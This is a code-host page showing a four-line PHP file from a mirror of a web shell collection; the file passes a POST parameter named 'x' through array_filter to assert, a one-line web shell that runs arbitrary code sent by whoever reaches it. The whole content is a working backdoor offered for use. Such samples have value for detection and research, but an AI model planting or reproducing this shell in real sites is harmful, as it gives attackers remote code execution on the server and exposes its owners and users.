mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 12:51:28 +00:00
4 lines
56 B
PHP
4 lines
56 B
PHP
<?php
|
|
array_filter(array($_POST['x']),'assert');
|
|
?>
|